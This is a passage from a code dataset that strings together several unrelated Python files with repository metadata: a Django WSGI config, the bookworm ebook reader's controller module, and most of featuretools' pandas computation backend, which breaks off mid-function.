    # translation marker, which is meant for log messages and returns a
    # translatable Message object rather than a plain header string.
    return "Basic {}".format(base64_val)
| 36.974359 | 106 | 0.638696 |
069e4c0507370f6176175763df8a27df9cf56367 | 407 | py | Python | backend/iris_lite_29300/wsgi.py | crowdbotics-apps/iris-lite-29300 | 49e487d9888b2ac95e23714c3ce22c03a1a3ab1f | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/iris_lite_29300/wsgi.py | crowdbotics-apps/iris-lite-29300 | 49e487d9888b2ac95e23714c3ce22c03a1a3ab1f | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/iris_lite_29300/wsgi.py | crowdbotics-apps/iris-lite-29300 | 49e487d9888b2ac95e23714c3ce22c03a1a3ab1f | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | """
WSGI config for iris_lite_29300 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os

from django.core.wsgi import get_wsgi_application

# Point Django at this project's settings before building the application;
# setdefault keeps an explicitly-exported DJANGO_SETTINGS_MODULE intact.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'iris_lite_29300.settings')

# Module-level WSGI callable that servers (gunicorn, uwsgi, ...) import.
application = get_wsgi_application()
| 23.941176 | 78 | 0.793612 |
4b2de3f4fa6b152697dea3402627288271d878ec | 15,425 | py | Python | bookworm/reader.py | mush42/bookworm | a4bdd89363137a89a1bed1e9e072de4fb55576fd | [
"MIT"
] | 18 | 2019-07-19T22:12:15.000Z | 2020-08-26T17:45:19.000Z | bookworm/reader.py | mush42/bookworm | a4bdd89363137a89a1bed1e9e072de4fb55576fd | [
"MIT"
] | 44 | 2019-07-15T10:17:00.000Z | 2020-07-26T11:22:53.000Z | bookworm/reader.py | mush42/bookworm | a4bdd89363137a89a1bed1e9e072de4fb55576fd | [
"MIT"
] | 9 | 2019-09-03T13:13:31.000Z | 2020-08-25T13:55:27.000Z | # coding: utf-8
import os
from contextlib import suppress
from pathlib import Path
from bookworm import typehints as t
from bookworm import app
from bookworm import config
from bookworm.commandline_handler import run_subcommand_in_a_new_process
from bookworm.database import DocumentPositionInfo
from bookworm.i18n import is_rtl
from bookworm.document.uri import DocumentUri
from bookworm.document.formats import *
from bookworm.document import (
BaseDocument,
BasePage,
Section,
ChangeDocument,
DocumentCapability as DC,
DocumentError,
DocumentIOError,
DocumentEncryptedError,
PaginationError,
ArchiveContainsNoDocumentsError,
ArchiveContainsMultipleDocuments,
)
from bookworm.signals import (
reader_book_loaded,
reader_book_unloaded,
reader_page_changed,
reader_section_changed,
reading_position_change,
)
from bookworm.structured_text import TextStructureMetadata, SemanticElementType
from bookworm.logger import logger
log = logger.getChild(__name__)

# Document exceptions that should propagate to the caller unchanged
# instead of being wrapped in a generic ReaderError (see UriResolver).
PASS_THROUGH__DOCUMENT_EXCEPTIONS = {
    ArchiveContainsNoDocumentsError,
    ArchiveContainsMultipleDocuments,
}
def get_document_format_info():
    """Return the registry mapping document format keys to document classes."""
    registry = BaseDocument.document_classes
    return registry
class ReaderError(Exception):
    """Base class for all reader exceptions."""


class ResourceDoesNotExist(ReaderError):
    """The file does not exist."""


class UnsupportedDocumentError(ReaderError):
    """File type/format is not supported."""


class DecryptionRequired(Exception):
    """Raised to signal to the view that the document requires a password to be decrypted."""
class UriResolver:
    """Retrieves a document given a uri.

    Resolves the uri's format to a registered document class and knows how
    to read the document, following fallback uris and document-change
    requests along the way.
    """

    def __init__(self, uri):
        """Accept a DocumentUri instance or its string serialization.

        Raises:
            ReaderError: if a string uri cannot be parsed.
            UnsupportedDocumentError: if no document class is registered
                for the uri's format.
        """
        if isinstance(uri, str):
            try:
                self.uri = DocumentUri.from_uri_string(uri)
            except ValueError as e:
                # Fix: the original interpolated self.uri here, but self.uri
                # is never assigned when parsing fails, so the f-string
                # raised AttributeError and masked the real parse error.
                raise ReaderError(f"Failed to parse document uri {uri}") from e
        else:
            self.uri = uri
        doc_format_info = get_document_format_info()
        if (doc_format := self.uri.format) not in doc_format_info:
            raise UnsupportedDocumentError(
                f"Could not open document from uri {self.uri}. The format is not supported."
            )
        self.document_cls = doc_format_info[doc_format]

    def __repr__(self):
        return f"UriResolver(uri={self.uri})"

    def should_read_async(self):
        """Whether the resolved document class prefers asynchronous reading."""
        return self.document_cls.should_read_async()

    def read_document(self):
        """Read and return the document, retrying with uri.fallback_uri on failure."""
        try:
            return self._do_read_document()
        except Exception:
            # Fix: narrowed from a bare `except:` so KeyboardInterrupt and
            # SystemExit are no longer swallowed by the fallback logic.
            if (fallback_uri := self.uri.fallback_uri) is not None:
                return UriResolver(uri=fallback_uri).read_document()
            raise

    def _do_read_document(self):
        """Instantiate the document class and read it, translating errors.

        Raises:
            DecryptionRequired: the document needs a password.
            ResourceDoesNotExist: underlying I/O failed.
            ReaderError: any other failure whose type is not listed in
                PASS_THROUGH__DOCUMENT_EXCEPTIONS.
        """
        document = self.document_cls(self.uri)
        try:
            document.read()
        except DocumentEncryptedError:
            raise DecryptionRequired
        except DocumentIOError as e:
            raise ResourceDoesNotExist("Failed to load document") from e
        except ChangeDocument as e:
            # The parser asked us to reopen the content under another uri
            # (e.g. an archive member); recurse with the new uri.
            log.debug(
                f"Changing document from {e.old_uri} to {e.new_uri}. Reason {e.reason}"
            )
            return UriResolver(uri=e.new_uri).read_document()
        except Exception as e:
            if type(e) in PASS_THROUGH__DOCUMENT_EXCEPTIONS:
                raise e
            raise ReaderError("Failed to open document") from e
        return document
class EBookReader:
    """The controller that glues together the
    document model and the view model.
    """

    # __state holds per-document mutable state keyed by name
    # ("current_page_index", "active_section", "navigation_stack").
    __slots__ = [
        "document",
        "stored_document_info",
        "view",
        "__state",
        "current_book",
    ]

    # Convenience method: make this available for importers as a staticmethod
    get_document_format_info = staticmethod(get_document_format_info)

    def __init__(self, view):
        self.view = view
        self.reset()

    def reset(self):
        """Clear all per-document state; called on init and on unload."""
        self.document = None
        self.stored_document_info = None
        self.__state = {}

    def set_document(self, document):
        """Install an already-read document and restore the reading position."""
        self.document = document
        self.current_book = self.document.metadata
        self.__state.setdefault("current_page_index", -1)
        self.set_view_parameters()
        self.current_page = 0
        if self.document.uri.view_args.get("save_last_position", True):
            log.debug("Retrieving last saved reading position from the database")
            self.stored_document_info = DocumentPositionInfo.get_or_create(
                title=self.current_book.title, uri=self.document.uri
            )
        # An explicit page/position in the uri's openner args wins over the
        # last stored position.
        if open_args := self.document.uri.openner_args:
            page = int(open_args.get("page", 0))
            pos = int(open_args.get("position", 0))
            self.go_to_page(page, pos)
            self.view.contentTextCtrl.SetFocus()
        elif (
            self.stored_document_info
            and config.conf["general"]["open_with_last_position"]
        ):
            try:
                log.debug("Navigating to the last saved position.")
                page_number, pos = self.stored_document_info.get_last_position()
                self.go_to_page(page_number, pos)
            except:
                log.exception(
                    "Failed to restore last saved reading position", exc_info=True
                )
        if self.active_section is None:
            self.__state.setdefault(
                "active_section",
                self.document.get_section_at_position(self.view.get_insertion_point()),
            )
        reader_book_loaded.send(self)

    def set_view_parameters(self):
        """Push title, text direction, and TOC tree to the view."""
        self.view.set_title(self.get_view_title(include_author=True))
        self.view.set_text_direction(self.document.language.is_rtl)
        self.view.add_toc_tree(self.document.toc_tree)

    def load(self, uri: DocumentUri):
        """Resolve `uri` to a document, read it, and install it."""
        document = UriResolver(uri).read_document()
        self.set_document(document)

    def unload(self):
        """Save position, close the document, and reset state."""
        if self.ready:
            try:
                log.debug("Saving current position.")
                self.save_current_position()
                log.debug("Closing current document.")
                self.document.close()
            except:
                log.exception(
                    "An exception was raised while closing the eBook", exc_info=True
                )
                if app.debug:
                    raise
            finally:
                self.reset()
                reader_book_unloaded.send(self)

    def save_current_position(self):
        # No-op when position persistence is disabled for this document.
        if self.stored_document_info is None:
            return
        self.stored_document_info.save_position(
            self.current_page,
            self.view.get_insertion_point(),
        )

    @property
    def ready(self) -> bool:
        # True once a document is loaded.
        return self.document is not None

    @property
    def active_section(self) -> Section:
        return self.__state.get("active_section")

    @active_section.setter
    def active_section(self, value: Section):
        # Skip redundant updates so the section-changed signal only fires
        # on a genuine change.
        if (self.active_section is not None) and (
            value.unique_identifier == self.active_section.unique_identifier
        ):
            return
        self.__state["active_section"] = value
        if self.document.has_toc_tree():
            self.view.set_state_on_section_change(value)
        reader_section_changed.send(self, active=value)

    @property
    def current_page(self) -> int:
        return self.__state["current_page_index"]

    @current_page.setter
    def current_page(self, value: int):
        if value == self.current_page:
            return
        if value not in self.document:
            raise PaginationError(
                f"Page {value} is out of range."
                f"Total number of pages in the document is: {len(self.document)}"
            )
        self.__state["current_page_index"] = value
        page = self.document[value]
        # Keep the active section in sync with the page (single-page
        # documents have no page-level sections).
        if not self.document.is_single_page_document():
            self.active_section = page.section
        self.view.set_state_on_page_change(page)
        # if config.conf["appearance"]["apply_text_styles"] and DC.TEXT_STYLE in self.document.capabilities:
        # self.view.apply_text_styles(page.get_style_info())
        reader_page_changed.send(self, current=page, prev=None)

    def get_current_page_object(self) -> BasePage:
        """Return the current page."""
        return self.document.get_page(self.current_page)

    def go_to_page(self, page_number: int, pos: int = 0) -> bool:
        # Jump to a page, then place the caret at `pos` within it.
        self.current_page = page_number
        self.view.set_insertion_point(pos)

    def go_to_page_by_label(self, page_label):
        """Navigate by the document's printed page label; False if unknown."""
        try:
            page = self.document.get_page_number_from_page_label(page_label)
            self.go_to_page(page.index)
            return True
        except LookupError:
            return False

    def navigate(self, to: str, unit: str) -> bool:
        """
        Navigate to `to` by unit `unit`.
        Return `True` if navigation was successful, `False` otherwise.
        If unit is page and the target is in another section, this method
        returns False.
        """
        assert to in ("next", "prev"), f"Invalid value {to} for arg`to`."
        assert unit in ("page", "section"), f"Invalid value {unit} for arg`unit`."
        if unit == "page":
            step = 1 if to == "next" else -1
            next_move = self.current_page + step
            page = None if next_move not in self.document else self.document[next_move]
            if page is not None:
                # Only move within the current section; crossing a section
                # boundary by page is reported as a failed navigation.
                if (to == "next" and not page.is_first_of_section) or (
                    to == "prev" and not page.is_last_of_section
                ):
                    self.current_page = next_move
                    return True
                else:
                    return False
        elif unit == "section":
            this_section = self.active_section
            target = "simple_next" if to == "next" else "simple_prev"
            self.active_section = getattr(self.active_section, target)
            if this_section.is_root and to == "next":
                self.active_section = this_section.first_child
            navigated = this_section is not self.active_section
            if navigated:
                self.go_to_first_of_section()
            return navigated

    def perform_wormhole_navigation(
        self, *, page, start, end, last_position: tuple[int, int] = None
    ):
        """Jump to a certain location in the open document storing the current position in the navigation history."""
        this_page = self.current_page
        if last_position is None:
            last_position = (self.view.get_insertion_point(), None)
        if page is not None:
            self.go_to_page(page)
        self.view.go_to_position(start, end)
        reading_position_change.send(self.view, position=start, tts_speech_prefix="")
        self.push_navigation_stack(this_page, *last_position)

    def go_to_next(self) -> bool:
        """Try to navigate to the next page."""
        current = self.current_page
        with suppress(PaginationError):
            self.current_page = current + 1
        return current != self.current_page

    def go_to_prev(self) -> bool:
        """Try to navigate to the previous page."""
        current = self.current_page
        with suppress(PaginationError):
            self.current_page = current - 1
        return current != self.current_page

    def go_to_first_of_section(self, section: Section = None):
        # Defaults to the active section when none is given.
        section = section or self.active_section
        self.current_page = section.pager.first

    def go_to_last_of_section(self, section: Section = None):
        section = section or self.active_section
        self.current_page = section.pager.last

    @property
    def navigation_stack(self):
        # Lazily created per-document back-navigation history.
        return self.__state.setdefault("navigation_stack", [])

    def push_navigation_stack(self, last_page, last_pos_start, last_pos_end):
        self.navigation_stack.append(
            {
                "last_page": last_page,
                "source_range": (last_pos_start, last_pos_end),
            }
        )

    def pop_navigation_stack(self):
        """Return to the most recently pushed position, if any."""
        try:
            nav_stack_top = self.navigation_stack.pop()
        except IndexError:
            self.view.notify_invalid_action()
            return
        else:
            if page_num := nav_stack_top.get("last_page"):
                self.go_to_page(page_num)
            start, end = nav_stack_top["source_range"]
            self.view.go_to_position(start, end)
            reading_position_change.send(
                self.view, position=start, tts_speech_prefix=""
            )

    def handle_special_action_for_position(self, position: int) -> bool:
        # Currently only links are handled: activate the link containing
        # the caret position, if any.
        for link_range in self.iter_semantic_ranges_for_elements_of_type(
            SemanticElementType.LINK
        ):
            if position in link_range:
                self.navigate_to_link_by_range(link_range)

    @staticmethod
    def _get_semantic_element_from_page(page, element_type, forward, anchor):
        # Find the next/previous element of `element_type` relative to
        # `anchor` within the given page's semantic structure.
        semantics = TextStructureMetadata(page.semantic_structure)
        pos_getter = (
            semantics.get_next_element_pos
            if forward
            else semantics.get_prev_element_pos
        )
        return pos_getter(element_type, anchor=anchor)

    def get_semantic_element(self, element_type, forward, anchor):
        return self._get_semantic_element_from_page(
            self.get_current_page_object(), element_type, forward, anchor
        )

    def iter_semantic_ranges_for_elements_of_type(self, element_type):
        semantics = TextStructureMetadata(
            self.get_current_page_object().semantic_structure
        )
        yield from semantics.iter_ranges(element_type)

    def navigate_to_link_by_range(self, link_range):
        """Resolve and follow the link occupying `link_range` on this page."""
        target_info = self.get_current_page_object().get_link_for_text_range(link_range)
        if target_info is None:
            log.warning(f"Could not resolve link target: {link_range=}")
            return
        elif target_info.is_external:
            self.view.go_to_webpage(target_info.url)
        else:
            start, end = target_info.position
            self.perform_wormhole_navigation(
                page=target_info.page, start=start, end=None, last_position=link_range
            )

    def get_view_title(self, include_author=False):
        """Compose the window title from book metadata or the file name."""
        if config.conf["general"]["show_file_name_as_title"]:
            try:
                document_path = self.document.get_file_system_path()
            except DocumentIOError:
                # Document has no file-system path; fall back to the title.
                view_title = self.current_book.title
            else:
                filename = os.path.split(document_path)[-1]
                view_title = os.path.splitext(filename)[0]
        else:
            view_title = self.current_book.title
        if include_author and self.current_book.author:
            author = self.current_book.author
            # Translators: the title of the window when an e-book is open
            view_title = _("{title} — by {author}").format(
                title=view_title, author=author
            )
        return view_title + f" - {app.display_name}"

    @staticmethod
    def open_document_in_a_new_instance(uri):
        # Spawn a separate app process running the "launcher" subcommand
        # with the uri serialized on the command line.
        run_subcommand_in_a_new_process(
            [
                "launcher",
                uri.base64_encode(),
            ],
            hidden=False,
        )
| 35.706019 | 117 | 0.629303 |
4364b963d25110c23dcefd8b5f495021deec4b0e | 24,817 | py | Python | featuretools/computational_backends/pandas_backend.py | gaybro8777/featuretools | 575fced6a3de6ec4190dc12c7c65a13d20e1c804 | [
"BSD-3-Clause"
] | 1 | 2019-07-29T14:47:06.000Z | 2019-07-29T14:47:06.000Z | featuretools/computational_backends/pandas_backend.py | Anyz01/FeatureTools | 0bb7b29045107e10acfab07322ef00934ec21c14 | [
"BSD-3-Clause"
] | null | null | null | featuretools/computational_backends/pandas_backend.py | Anyz01/FeatureTools | 0bb7b29045107e10acfab07322ef00934ec21c14 | [
"BSD-3-Clause"
] | null | null | null | import cProfile
import os
import pstats
import sys
import warnings
from datetime import datetime
import numpy as np
import pandas as pd
import pandas.api.types as pdtypes
from .base_backend import ComputationalBackend
from .feature_tree import FeatureTree
from featuretools import variable_types
from featuretools.exceptions import UnknownFeature
from featuretools.feature_base import (
AggregationFeature,
DirectFeature,
IdentityFeature,
TransformFeature
)
from featuretools.utils.gen_utils import (
get_relationship_variable_id,
make_tqdm_iterator
)
# Silence noisy numpy warnings emitted during bulk feature computation
# (e.g. polynomial fits inside primitives).
warnings.simplefilter('ignore', np.RankWarning)
warnings.simplefilter("ignore", category=RuntimeWarning)
class PandasBackend(ComputationalBackend):
def __init__(self, entityset, features):
    # All output features must be defined on a single target entity.
    assert len(set(f.entity.id for f in features)) == 1, \
        "Features must all be defined on the same entity"
    self.entityset = entityset
    self.target_eid = features[0].entity.id
    self.features = features
    # Dependency-ordered view of the features used to schedule computation.
    self.feature_tree = FeatureTree(entityset, features)

def __sizeof__(self):
    # The entityset dominates this object's memory footprint.
    return self.entityset.__sizeof__()
def calculate_all_features(self, instance_ids, time_last,
                           training_window=None, profile=False,
                           precalculated_features=None, ignored=None,
                           verbose=False):
    """
    Given a list of instance ids and features with a shared time window,
    generate and return a mapping of instance -> feature values.

    Args:
        instance_ids (list): List of instance id for which to build features.

        time_last (pd.Timestamp): Last allowed time. Data from exactly this
            time not allowed.

        training_window (Timedelta, optional): Data older than
            time_last by more than this will be ignored.

        profile (bool): Enable profiler if True.

        verbose (bool): Print output progress if True.

    Returns:
        pd.DataFrame : Pandas DataFrame of calculated feature values.
            Indexed by instance_ids. Columns in same order as features
            passed in.
    """
    assert len(instance_ids) > 0, "0 instance ids provided"
    self.instance_ids = instance_ids

    self.time_last = time_last
    if self.time_last is None:
        self.time_last = datetime.now()

    # For debugging
    if profile:
        pr = cProfile.Profile()
        pr.enable()

    if precalculated_features is None:
        precalculated_features = {}

    # Access the index to get the filtered data we need
    target_entity = self.entityset[self.target_eid]
    if ignored:
        # TODO: Just want to remove entities if don't have any (sub)features defined
        # on them anymore, rather than recreating
        ordered_entities = FeatureTree(self.entityset, self.features, ignored=ignored).ordered_entities
    else:
        ordered_entities = self.feature_tree.ordered_entities

    necessary_columns = self.feature_tree.necessary_columns
    eframes_by_filter = \
        self.entityset.get_pandas_data_slice(filter_entity_ids=ordered_entities,
                                             index_eid=self.target_eid,
                                             instances=instance_ids,
                                             entity_columns=necessary_columns,
                                             time_last=time_last,
                                             training_window=training_window,
                                             verbose=verbose)
    large_eframes_by_filter = None
    # Some transform primitives need the *full* entity (all instances, not
    # just the requested ones); fetch a second, unfiltered slice for those.
    if any([f.primitive.uses_full_entity for f in self.feature_tree.all_features if isinstance(f, TransformFeature)]):
        large_necessary_columns = self.feature_tree.necessary_columns_for_all_values_features
        large_eframes_by_filter = \
            self.entityset.get_pandas_data_slice(filter_entity_ids=ordered_entities,
                                                 index_eid=self.target_eid,
                                                 instances=None,
                                                 entity_columns=large_necessary_columns,
                                                 time_last=time_last,
                                                 training_window=training_window,
                                                 verbose=verbose)

    # Handle an empty time slice by returning a dataframe with defaults
    if eframes_by_filter is None:
        return self.generate_default_df(instance_ids=instance_ids)

    finished_entity_ids = []
    # Populate entity_frames with precalculated features
    if len(precalculated_features) > 0:
        for entity_id, precalc_feature_values in precalculated_features.items():
            if entity_id in eframes_by_filter:
                frame = eframes_by_filter[entity_id][entity_id]
                eframes_by_filter[entity_id][entity_id] = pd.merge(frame,
                                                                   precalc_feature_values,
                                                                   left_index=True,
                                                                   right_index=True)
            else:
                # Only features we're taking from this entity
                # are precomputed
                # Make sure the id variable is a column as well as an index
                entity_id_var = self.entityset[entity_id].index
                precalc_feature_values[entity_id_var] = precalc_feature_values.index.values
                eframes_by_filter[entity_id] = {entity_id: precalc_feature_values}
            finished_entity_ids.append(entity_id)

    # Iterate over the top-level entities (filter entities) in sorted order
    # and calculate all relevant features under each one.
    if verbose:
        total_groups_to_compute = sum(len(group)
                                      for group in self.feature_tree.ordered_feature_groups.values())

        pbar = make_tqdm_iterator(total=total_groups_to_compute,
                                  desc="Computing features",
                                  unit="feature group")
    if verbose:
        pbar.update(0)

    for filter_eid in ordered_entities:
        entity_frames = eframes_by_filter[filter_eid]
        large_entity_frames = None
        if large_eframes_by_filter is not None:
            large_entity_frames = large_eframes_by_filter[filter_eid]

        # update the current set of entity frames with the computed features
        # from previously finished entities
        for eid in finished_entity_ids:
            # only include this frame if it's not from a descendent entity:
            # descendent entity frames will have to be re-calculated.
            # TODO: this check might not be necessary, depending on our
            # constraints
            if not self.entityset.find_backward_path(start_entity_id=filter_eid,
                                                     goal_entity_id=eid):
                entity_frames[eid] = eframes_by_filter[eid][eid]
                # TODO: look this over again
                # precalculated features will only be placed in entity_frames,
                # and it's possible that that they are the only features computed
                # for an entity. In this case, the entity won't be present in
                # large_eframes_by_filter. The relevant lines that this case passes
                # through are 136-143
                if (large_eframes_by_filter is not None and
                        eid in large_eframes_by_filter and eid in large_eframes_by_filter[eid]):
                    large_entity_frames[eid] = large_eframes_by_filter[eid][eid]

        if filter_eid in self.feature_tree.ordered_feature_groups:
            for group in self.feature_tree.ordered_feature_groups[filter_eid]:
                if verbose:
                    pbar.set_postfix({'running': 0})

                test_feature = group[0]
                entity_id = test_feature.entity.id

                input_frames_type = self.feature_tree.input_frames_type(test_feature)

                input_frames = large_entity_frames
                if input_frames_type == "subset_entity_frames":
                    input_frames = entity_frames

                handler = self._feature_type_handler(test_feature)
                result_frame = handler(group, input_frames)

                output_frames_type = self.feature_tree.output_frames_type(test_feature)
                if output_frames_type in ['full_and_subset_entity_frames', 'subset_entity_frames']:
                    index = entity_frames[entity_id].index
                    # If result_frame came from a uses_full_entity feature,
                    # and the input was large_entity_frames,
                    # then it's possible it doesn't contain some of the features
                    # in the output entity_frames
                    # We thus need to concatenate the existing frame with the result frame,
                    # making sure not to duplicate any columns
                    _result_frame = result_frame.reindex(index)
                    cols_to_keep = [c for c in _result_frame.columns
                                    if c not in entity_frames[entity_id].columns]
                    entity_frames[entity_id] = pd.concat([entity_frames[entity_id],
                                                          _result_frame[cols_to_keep]],
                                                         axis=1)

                if output_frames_type in ['full_and_subset_entity_frames', 'full_entity_frames']:
                    index = large_entity_frames[entity_id].index
                    _result_frame = result_frame.reindex(index)
                    cols_to_keep = [c for c in _result_frame.columns
                                    if c not in large_entity_frames[entity_id].columns]
                    large_entity_frames[entity_id] = pd.concat([large_entity_frames[entity_id],
                                                                _result_frame[cols_to_keep]],
                                                               axis=1)

                if verbose:
                    pbar.update(1)

        finished_entity_ids.append(filter_eid)

    if verbose:
        pbar.set_postfix({'running': 0})
        pbar.refresh()
        sys.stdout.flush()
        pbar.close()

    # debugging
    if profile:
        pr.disable()
        ROOT_DIR = os.path.expanduser("~")
        prof_folder_path = os.path.join(ROOT_DIR, 'prof')
        if not os.path.exists(prof_folder_path):
            os.mkdir(prof_folder_path)
        with open(os.path.join(prof_folder_path, 'inst-%s.log' %
                               list(instance_ids)[0]), 'w') as f:
            pstats.Stats(pr, stream=f).strip_dirs().sort_stats("cumulative", "tottime").print_stats()

    df = eframes_by_filter[self.target_eid][self.target_eid]

    # fill in empty rows with default values
    missing_ids = [i for i in instance_ids if i not in
                   df[target_entity.index]]
    if missing_ids:
        default_df = self.generate_default_df(instance_ids=missing_ids,
                                              extra_columns=df.columns)
        df = df.append(default_df, sort=True)

    df.index.name = self.entityset[self.target_eid].index
    column_list = []
    for feat in self.features:
        column_list.extend(feat.get_feature_names())
    return df[column_list]
def generate_default_df(self, instance_ids, extra_columns=None):
    """Build a frame of default feature values for the given instances.

    Every requested instance gets each feature's ``default_value``; any
    ``extra_columns`` not produced by the features are filled with NaN.
    The index is named after the target entity's index variable.
    """
    column_names = []
    row_values = []
    for feature in self.features:
        for feature_name in feature.get_feature_names():
            column_names.append(feature_name)
            row_values.append(feature.default_value)
    default_df = pd.DataFrame([row_values] * len(instance_ids),
                              columns=column_names,
                              index=instance_ids)
    default_df.index.name = self.features[0].entity.index
    if extra_columns is not None:
        for column in (c for c in extra_columns if c not in default_df.columns):
            default_df[column] = [np.nan] * len(instance_ids)
    return default_df
def _feature_type_handler(self, f):
    """Return the calculation routine matching the feature's type."""
    # Ordered dispatch: subclass checks must run before base-class checks,
    # mirroring the original isinstance chain.
    dispatch = (
        (TransformFeature, self._calculate_transform_features),
        (DirectFeature, self._calculate_direct_features),
        (AggregationFeature, self._calculate_agg_features),
        (IdentityFeature, self._calculate_identity_features),
    )
    for feature_type, handler in dispatch:
        if isinstance(f, feature_type):
            return handler
    raise UnknownFeature(u"{} feature unknown".format(f.__class__))
def _calculate_identity_features(self, features, entity_frames):
    """Identity features are pre-existing columns; hand back the frame as-is."""
    frame_key = features[0].entity.id
    column = features[0].get_name()
    assert frame_key in entity_frames and column in entity_frames[frame_key].columns
    return entity_frames[frame_key]
def _calculate_transform_features(self, features, entity_frames):
    """Compute transform features in place on their entity's frame."""
    entity_id = features[0].entity.id
    assert len(set([f.entity.id for f in features])) == 1, \
        "features must share base entity"
    assert entity_id in entity_frames

    frame = entity_frames[entity_id]
    for f in features:
        # handle when no data
        if frame.shape[0] == 0:
            set_default_column(frame, f)
            continue

        # collect only the variables we need for this transformation
        variable_data = [frame[bf.get_name()].values
                         for bf in f.base_features]
        feature_func = f.get_function()
        # apply the function to the relevant dataframe slice and add the
        # feature row to the results dataframe.
        if f.primitive.uses_calc_time:
            values = feature_func(*variable_data, time=self.time_last)
        else:
            values = feature_func(*variable_data)

        # if we don't get just the values, the assignment breaks when indexes don't match
        def strip_values_if_series(values):
            if isinstance(values, pd.Series):
                values = values.values
            return values

        # Normalize to a list of raw arrays: one per output feature.
        if f.number_output_features > 1:
            values = [strip_values_if_series(value) for value in values]
        else:
            values = [strip_values_if_series(values)]
        update_feature_columns(f, frame, values)

    return frame
def _calculate_direct_features(self, features, entity_frames):
    """Pull parent-entity values into the child frame via a left merge."""
    entity_id = features[0].entity.id
    parent_entity_id = features[0].parent_entity.id

    assert entity_id in entity_frames and parent_entity_id in entity_frames

    path = self.entityset.find_forward_path(entity_id, parent_entity_id)
    assert len(path) == 1, \
        "Error calculating DirectFeatures, len(path) > 1"

    parent_df = entity_frames[parent_entity_id]
    child_df = entity_frames[entity_id]
    merge_var = path[0].child_variable.id

    # generate a mapping of old column names (in the parent entity) to
    # new column names (in the child entity) for the merge
    col_map = {path[0].parent_variable.id: merge_var}
    index_as_feature = None
    for f in features:
        if f.base_features[0].get_name() == path[0].parent_variable.id:
            index_as_feature = f
        # Sometimes entityset._add_multigenerational_links adds link variables
        # that would ordinarily get calculated as direct features,
        # so we make sure not to attempt to calculate again
        base_names = f.base_features[0].get_feature_names()
        for name, base_name in zip(f.get_feature_names(), base_names):
            if name in child_df.columns:
                continue
            col_map[base_name] = name

    # merge the identity feature from the parent entity into the child
    merge_df = parent_df[list(col_map.keys())].rename(columns=col_map)
    if index_as_feature is not None:
        # The parent's index itself is requested; keep it as a column too.
        merge_df.set_index(index_as_feature.get_name(), inplace=True,
                           drop=False)
    else:
        merge_df.set_index(merge_var, inplace=True)

    new_df = pd.merge(left=child_df, right=merge_df,
                      left_on=merge_var, right_index=True,
                      how='left')

    return new_df
    def _calculate_agg_features(self, features, entity_frames):
        """Compute aggregation features over a child entity's rows and merge
        the results into the parent entity's frame.

        Parameters
        ----------
        features : list
            Aggregation features assumed to share the same parent entity,
            child entity, ``where`` clause and ``use_previous`` window —
            only ``features[0]`` is inspected for those attributes
            (TODO confirm this invariant with callers).
        entity_frames : dict
            Maps entity id -> pandas DataFrame; must contain frames for
            both the parent and the child entity.

        Returns
        -------
        pandas.DataFrame
            The parent frame with one new column per computed feature
            (existing columns are left untouched).
        """
        test_feature = features[0]
        entity = test_feature.entity
        child_entity = test_feature.base_features[0].entity
        assert entity.id in entity_frames and child_entity.id in entity_frames
        frame = entity_frames[entity.id]
        base_frame = entity_frames[child_entity.id]
        # Sometimes approximate features get computed in a previous filter frame
        # and put in the current one dynamically,
        # so there may be existing features here
        features = [f for f in features if f.get_name()
                    not in frame.columns]
        if not len(features):
            return frame
        # handle where
        # restrict the child rows to those where the boolean `where` column is True
        where = test_feature.where
        if where is not None and not base_frame.empty:
            base_frame = base_frame.loc[base_frame[where.get_name()]]
        # when no child data, just add all the features to frame with nan
        if base_frame.empty:
            for f in features:
                frame[f.get_name()] = np.nan
        else:
            relationship_path = self.entityset.find_backward_path(entity.id,
                                                                  child_entity.id)
            # column in the child frame used to group rows by parent instance
            groupby_var = get_relationship_variable_id(relationship_path)
            # if the use_previous property exists on this feature, include only the
            # instances from the child entity included in that Timedelta
            use_previous = test_feature.use_previous
            if use_previous and not base_frame.empty:
                # Filter by use_previous values
                time_last = self.time_last
                if use_previous.is_absolute():
                    # absolute window: keep rows whose time index falls within
                    # [time_last - use_previous, time_last]
                    time_first = time_last - use_previous
                    ti = child_entity.time_index
                    if ti is not None:
                        base_frame = base_frame[base_frame[ti] >= time_first]
                else:
                    # relative window: keep only the last n rows per group
                    n = use_previous.value

                    def last_n(df):
                        return df.iloc[-n:]

                    base_frame = base_frame.groupby(groupby_var, observed=True, sort=False).apply(last_n)
            # to_agg: base column name -> list of aggregation callables for .agg()
            to_agg = {}
            # agg_rename: pandas-generated "<column>-<funcname>" -> desired feature name
            agg_rename = {}
            # to_apply: features that need the slower groupby-apply path
            to_apply = set()
            # apply multivariable and time-dependent features as we find them, and
            # save aggregable features for later
            for f in features:
                if _can_agg(f):
                    variable_id = f.base_features[0].get_name()
                    if variable_id not in to_agg:
                        to_agg[variable_id] = []
                    func = f.get_function()
                    funcname = func
                    if callable(func):
                        # make sure func has a unique name due to how pandas names aggregations
                        func.__name__ = f.primitive.name
                        funcname = f.primitive.name
                    to_agg[variable_id].append(func)
                    # this is used below to rename columns that pandas names for us
                    agg_rename[u"{}-{}".format(variable_id, funcname)] = f.get_name()
                    continue
                to_apply.add(f)
            # Apply the non-aggregable functions generate a new dataframe, and merge
            # it with the existing one
            if len(to_apply):
                wrap = agg_wrapper(to_apply, self.time_last)
                # groupby_var can be both the name of the index and a column,
                # to silence pandas warning about ambiguity we explicitly pass
                # the column (in actuality grouping by both index and group would
                # work)
                to_merge = base_frame.groupby(base_frame[groupby_var], observed=True, sort=False).apply(wrap)
                frame = pd.merge(left=frame, right=to_merge,
                                 left_index=True,
                                 right_index=True, how='left')
            # Apply the aggregate functions to generate a new dataframe, and merge
            # it with the existing one
            if len(to_agg):
                # groupby_var can be both the name of the index and a column,
                # to silence pandas warning about ambiguity we explicitly pass
                # the column (in actuality grouping by both index and group would
                # work)
                to_merge = base_frame.groupby(base_frame[groupby_var],
                                              observed=True, sort=False).agg(to_agg)
                # rename columns to the correct feature names
                to_merge.columns = [agg_rename["-".join(x)] for x in to_merge.columns.ravel()]
                to_merge = to_merge[list(agg_rename.values())]
                # workaround for pandas bug where categories are in the wrong order
